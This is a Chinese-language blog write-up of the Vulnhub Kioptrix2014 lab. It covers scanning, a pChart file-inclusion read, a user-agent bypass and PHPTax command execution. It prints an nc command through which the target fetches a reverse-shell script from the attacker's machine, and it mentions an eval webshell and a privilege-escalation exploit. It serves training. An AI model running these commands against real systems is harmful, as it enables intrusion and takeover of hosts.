Vulnhub Kioptrix2014 Writeup

Talk is cheap, show me writeup

用到的工具和知识

nmap、dirb、nikto、google、searchsploit、LFI、BurpSuite、netcat

靶机下载

0x00 前置问题解决

  • 靶机启动之后,nmap扫不到靶机ip,即使重启更换NAT模式也无效?
    • 将虚拟机配置中网络适配器移除,再次安装,设定为NAT或者桥接即可
    • blog

0x01 信息搜集

nmap查找基本信息

80和8080端口开启

访问80端口

8080端口

8080端口暂时没有权限访问

用工具继续收集信息

我们用目录遍历工具dirb、nikto、whatweb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

#
dirb commen.txt扫描结果:
80
+ http://192.168.206.141:80/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.206.141:80/index.html (CODE:200|SIZE:152)

8080
+ http://192.168.206.141:8080/cgi-bin/ (CODE:403|SIZE:210)

#
whatweb扫描结果:
80
# http://192.168.206.141:80
[200 OK] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], Meta-Refresh-Redirect[pChart2.1.3/index.php], OpenSSL[0.9.8q], PHP[5.3.8], WebDAV[2]

#
http://192.168.206.141/pChart2.1.3/index.php
[302 Found] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], RedirectLocation[examples/index.php], WebDAV[2], X-Powered-By[PHP/5.3.8]

#
http://192.168.206.141/pChart2.1.3/examples/index.php
[200 OK] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], Script, Title[pChart 2.x - examples rendering], WebDAV[2], X-Powered-By[PHP/5.3.8]

8080
# http://192.168.206.141:8080
[403 Forbidden] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], Title[403 Forbidden], WebDAV[2]

#
nikto扫描结果:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.206.141
+ Target Hostname: 192.168.206.141
+ Target Port: 80
+ Start Time: 2020-03-10 14:34:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2020-03-10 14:35:54 (GMT8) (76 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

发现whatweb扫描80端口出来一个http://192.168.206.141/pChart2.1.3/index.php,访问一下试试

发现是个图表生成页面(PHP做的),这应该就是靶机入口了,进一步侦查,可以点击相应按钮阅读代码,发现都是先将PHP包含进来

访问http://192.168.206.141/pChart2.1.3/class/,出现如下页面

既然已经出现了一个路径,可以想到能访问的不止这一个路径,于是在其基础上继续用dirb、nikto扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
$ dirb http://192.168.206.141/pChart2.1.3/
# dirb扫描结果:
START_TIME: Tue Mar 10 14:59:28 2020
URL_BASE: http://192.168.206.141/pChart2.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.206.141/pChart2.1.3/ ----
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/cache/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/class/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/data/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/fonts/
+ http://192.168.206.141/pChart2.1.3/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.206.141/pChart2.1.3/cache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/class/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/data/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/ ----
+ http://192.168.206.141/pChart2.1.3/examples/index.php (CODE:200|SIZE:86764)
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/pictures/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/resources/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/

---- Entering directory: http://192.168.206.141/pChart2.1.3/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/pictures/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/ ----
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/includes/
+ http://192.168.206.141/pChart2.1.3/examples/sandbox/index.php (CODE:200|SIZE:45314)
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/script/

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/script/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Mar 10 15:01:35 2020
DOWNLOADED: 13836 - FOUND: 3

#
nikto扫描结果:
---------------------------------------------------------------------------
+ Target IP: 192.168.206.141
+ Target Hostname: 192.168.206.141
+ Target Port: 80
+ Start Time: 2020-03-10 14:59:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Retrieved x-powered-by header: PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: examples/index.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-12184: /pChart2.1.3/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /pChart2.1.3/data/: Directory indexing found.
+ OSVDB-3092: /pChart2.1.3/data/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /pChart2.1.3/readme.txt, inode: 505755, size: 12220, mtime: Fri Sep 9 16:48:27 2011
+ OSVDB-3092: /pChart2.1.3/readme.txt: This might be interesting...
+ 7536 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-03-10 15:00:45 (GMT8) (90 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

可以看见nikto扫描结果中出现了如/pChart2.1.3/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000这样的链接,我们访问试试,有些是图片,还有一个是所谓的phpinfo

这个PHP Credit只有模块名和作者名,其他什么都没有。这里我想是不是phpinfo这一块有盲区,于是Google一番,没有什么实际效果。(第一个兔子洞)

思路卡壳,遂上网借鉴walkthrough

  • 发现搜索思维和Google技术还是不到家,没转过弯来。我既然对某些部分一无所知,那么这些部分存在的漏洞也就被略过了
  • 其实可以多问问自己这个图表模块(PHP编写)懂吗?会不会是通用的模块?是否存在漏洞?

0x02 漏洞挖掘与利用

按照这个思路,我继续Google

这里也可以直接在kali上用searchsploit,不过可能性会比Google小,所以要抱有一种乐观的冷静

测试这两个poc,可以运行,但是我又陷入了不知道该做什么的境地,原因还是对于这个环境不了解,不知道那些信息对于渗透比较重要,于是根据上面的想法提炼关键词:apache 敏感信息apache 2.2.21 敏感信息PHP 5.3.8敏感信息Apache默认路径

找到如下两个有用信息:

各种OS的Apache默认路径

敏感信息搜集

还是一番执行过程中看不到希望的测试(因为效率低,所以要编写脚本or搜集更多有效信息),终于发现一个有效敏感配置信息

篇幅不长,仔细阅读非注释信息后,发现8080端口不能访问是因为设置了只允许浏览器为Mozilla4通过

好,到这一步我想到修改UA,那就使用BP,将Mozilla 5.0修改为4.0后,8080页面即可见

可是我后续要一直访问这个端口,每次手动改不现实,那么就用Match and Replace实现修改通过bp的每个数据包

ok,点击index,成功进入下一步,是个PHPTAX,有了经验,继续用之前总结的方法论,上Google & searchsploit

找到相应漏洞版本,exploit

复制粘贴保存txt内的PHP exp,按照参数执行

报错,说没有curl_init(),Google如何开启

修改php.ini;extension=curl去掉前面的;注释,再次运行如上图,查找后并没有curl的动态链接库(Linux下为so,Windows为dll)

大概2个小时的调试安装(因为我用的2018版kali,😭),终于见到下面这张图

unsuccessful!那么我换个exp,用/usr/share/exploitdb/exploits/php/webapps/21665.txt

持续失败,休息了一会,决定阅读一下刚才的exp源码,把url复制粘贴到浏览器,访问成功

尝试下一步的时候,却说不存在rce.php,传shell不成,难不成真要使用msf?不存在的,/phptax/继续目录爆破

挨个路径访问,发现phptax/data/路径中我们的php shell的确已经写入,但是执行不了,同时发现phptax/data/pdf路径也有料

再次借鉴walkthrough!

发现有些前辈可以执行命令,有些却并不能成功,同时他们也发现靶机上没有bash,没有python,有sh,可是用url直接访问依然不能工作,测试telnet也失败。(当然msf还是一波带走)

他们成功的方法:

  • perl (用perl反弹shell)
  • 想要写入webshell的话,必须在$前添加\转义,比如`echo @eval(\$_POST[‘psw’]);

我参考第二种方法

可以直接查询信息,但也不能直接连接(nc秒断)

那么试试nc传送(也可以用ftp)php-reverse-shell.php,我们在/usr/share/webshell/php/中找,改好ip和端口

1
2
3
4
# kali 发送
nc -lvp 4444 < php-reverse-shell.php
# url 靶机接收
192.168.206.141:8080/phptax/ips.php?m=nc%20192.168.206.140%201234%20%3E%20php-reverse-shell.php

接收成功!我们在kali上监听,浏览器中访问shell.php

0x03 提权&GetFlag

提权就很简单了,直接以OS版本FreeBSD为关键词搜索exp

我们下到/tmp目录,直接用nc将exp传入靶机,gcc编译运行即提权

/root下找到congrats.txt

0x04 总结

  • 不断思考自己有什么信息,信息的作用范围,对这一块有没有了解过,是否会存在漏洞,提炼关键词Google
  • 对于不同的经典漏洞,肯定会衍生处各种附属品,要想不断熟练并深挖这些漏洞,除了要了解深刻原理以外还要不断主动积累经验
    • 比如复现不同场景的利用方式,利用资料
    • 再打个比方:在打比赛或者测试时,会遇到任意文件读取或者目录穿越之类的漏洞,可以读取一些敏感文件来更进一步,所以这种东西并不是没有目的去搜集,正是因为有漏洞配合才是我们去学习、去搜集的初衷

0x05 参考资源

Kioptrix 2014

Kioptrix2014 (#5)

Hacking Kioptrix 2014


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!